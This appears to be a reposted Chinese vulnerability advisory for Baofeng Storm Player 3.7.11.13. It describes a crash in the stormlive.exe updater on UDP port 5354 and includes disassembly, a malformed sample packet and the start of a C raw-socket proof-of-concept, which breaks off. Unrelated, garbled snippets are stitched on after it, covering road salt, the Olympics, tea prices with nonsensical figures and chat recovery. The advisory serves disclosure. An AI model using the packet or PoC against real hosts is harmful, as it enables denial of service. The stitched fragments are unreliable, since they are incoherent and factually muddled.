传说中的《暴风影音3》新版本爆漏洞,这次很夸张,远程拒绝服务.吐血写出来的软件还是没过关起因是暴风影音自动更新程序会在远程监听一个端口,如果向其发送畸形数据包,就会导致自动更新程序崩溃;如果对其发送精心构造过的数据包,则足以导致用户主机在不知情的情况下被完全控制.以下是帖子全文: CISVul20071128 暴风影音3.7.11.13 DOS Vul |=----------------[ 暴风影音3.7.11.13 DOS Vulnerabilities ]-------=||=-----------------------------------------------------------------=||=---------------=[ TuTu ]=-----------------------------=||=-----------------------------------------------------------------=||=---------------=[ Copyright:www.cisrg.cn ]=----------------------=| --] 介绍暴风影音是一款播放软件,经过测试,暴风影音3.7.11.13存在一个远程DDOS漏洞。官方网站:http://www.baofeng.com/ --] Author:TuTu --] 漏洞分析/*++暴风影音3 Build version : 3.7.11.13 Test version : 3.7.11.13,自从带了一个自动升级服务stormlive.exe之后,会在本地开启一个UDP端口5354,向端口发送恶意封包可造成stormlive崩溃 0041DEE0 /$ 8B4424 08 mov eax, dword ptr [esp+8]0041DEE4 |. 53 push ebx0041DEE5 |. 8BD9 mov ebx, ecx0041DEE7 |. 56 push esi0041DEE8 |. 33C9 xor ecx, ecx0041DEEA |. 57 push edi0041DEEB |. 8943 08 mov dword ptr [ebx+8], eax0041DEEE |. 6A 04 push 4 ; /size = 40041DEF0 |. C1E8 07 shr eax, 7 ; |0041DEF3 |. 40 inc eax ; |0041DEF4 |. 894B 04 mov dword ptr [ebx+4], ecx ; |0041DEF7 |. C1E0 07 shl eax, 7 ; |0041DEFA |. 50 push eax ; |nitems 0041DEFB |. 884B 10 mov byte ptr [ebx+10], cl ; |0041DEFE |. C703 C0524300 mov dword ptr [ebx], 004352C0 ; |0041DF04 |. 8943 0C mov dword ptr [ebx+C], eax ; |0041DF07 |. FF15 78154300 call dword ptr [<&MSVCRT.calloc>] ; \calloc0041DF0D |. 8B4B 08 mov ecx, dword ptr [ebx+8]0041DF10 |. 8B7424 18 mov esi, dword ptr [esp+18]0041DF14 |. C1E1 02 shl ecx, 20041DF17 |. 8943 04 mov dword ptr [ebx+4], eax0041DF1A |. 8BF8 mov edi, eax0041DF1C |. 8BC1 mov eax, ecx0041DF1E |. 83C4 08 add esp, 80041DF21 |. C1E9 02 shr ecx, 20041DF24 |. F3:A5 rep movs dword ptr es:[edi], dword p> 溢出0041DF26 |. 8BC8 mov ecx, eax0041DF28 |. 83E1 03 and ecx, 30041DF2B |. F3:A4 rep movs byte ptr es:[edi], byte ptr>0041DF2D |. 8BCB mov ecx, ebx0041DF2F |. E8 3C140000 call 0041F3700041DF34 |. 5F pop edi0041DF35 |. 8BC3 mov eax, ebx0041DF37 |. 5E pop esi0041DF38 |. 5B pop ebx0041DF39 \. C2 0800 retn 8 封包例子00CAFF84 4B 55 44 50 01 00 55 55 55 00 55 55 55 00 KUDP .UUU.UUU.由于没有对封包中取得的数据进行判断.数据超大导致申请内存失败,后面的内存数据复制导致异常. --*/ --] exploit POC#ifndef WIN32_LEAN_AND_MEAN#define WIN32_LEAN_AND_MEAN#endif #include #include #include #pragma comment(lib, "ws2_32") // Set the packing to a 1 byte boundary#include //// Define the IPv4 header. Make the version and length field one// character since we can't declare two 4 bit fields without// the compiler aligning them on at least a 1 byte boundary.//typedef struct ip_hdr{unsigned char ip_verlen; // 4-bit IPv4 version// 4-bit header length (in 32-bit words)unsigned char ip_tos; // IP type of serviceunsigned short ip_totallength; // Total lengthunsigned short ip_id; // Unique identifierunsigned short ip_offset; // Fragment offset fieldunsigned char ip_ttl; // Time to liveunsigned char ip_protocol; // Protocol(TCP,UDP etc)unsigned short ip_checksum; // IP checksumunsigned int ip_srcaddr; // Source addressunsigned int ip_destaddr; // Source address} IPV4_HDR, *PIPV4_HDR, FAR * LPIPV4_HDR; ////
近期下雪漂落南通市,为了更好地便捷交通出行人的安全性,本地在地面撒融雪盐,降低路面冷冻。但是却发觉有沿路群众取走融雪盐,那麼融雪盐究竟能不能吃呢?融雪盐与一般盐的差别,食盐为何能够 融冰化雪。 融雪...
一个月前,有人对“平昌”和“昌平”傻傻分不清楚,让北京昌平区的小伙伴笑岔了气,连忙辟谣:一个月就想让我举办冬奥会,玩不起玩不起。 幺蛾子刚过没多久,韩国媒体报道,平昌冬奥会组委会 2 月 10 日(...
在iOS的方位最终,运转下列指令将项目代码克隆至本地:进犯者正在向更精细化的方向演化,更多相似CC进犯的行为出现在一些事务特点显着的接口上,如登录接口、短信验证码接口、查票接口、专利查询接口等。 即越...
编辑导读:作为一个新用户,进入一个网站可能产物的第一件事就是去看导航栏,按照导航栏的指引找到本身想要的信息。本文作者基于本身的事情履历,将从五个方面复盘了B端的导航设计,但愿对你有辅佐。 公司想要对...
瑞芳吴德泰茶叶价值表批发价查询 吴德泰茶叶111克 5703元/克 吴德泰茶叶270盒 2620元/盒 吴德泰茶叶148斤 6896元/两 吴德泰茶叶269斤 778...
用腾讯手机助手点击文件管理可以导出聊天记录。安装腾讯手机助手,将手机连接到电脑上,当软件显示成功连接后,点击我。 微信聊天记录删除几个月了还能恢复?最近有很多小伙伴都在询问这个问题,要说以前这个问题可...